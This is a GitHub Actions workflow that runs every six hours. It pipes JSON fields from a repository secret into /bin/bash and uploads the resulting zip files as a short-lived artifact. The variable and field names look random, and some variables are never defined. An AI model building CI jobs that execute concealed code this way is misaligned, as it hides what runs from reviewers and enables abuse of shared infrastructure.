name: langminghongcai
on:
  workflow_dispatch:

  schedule:
    - cron: '51 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: langminghongcai
        env:
          k24489: ${{ secrets.k24489 }}
        run: |
          printf '%s' "$k24489" | jq -r .jmbxj4 | /bin/bash
          echo $ddh9130 | jq -r .if7441 | /bin/bash
          echo $cib4279 | jq -r .e1 | /bin/bash
          echo $w732 | jq -r .tplgg494 | /bin/bash
          printf '%s' "$zy48739" | jq -r .asgdv555 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: IOmWqX0v
          path: "*.zip"
          retention-days: 1
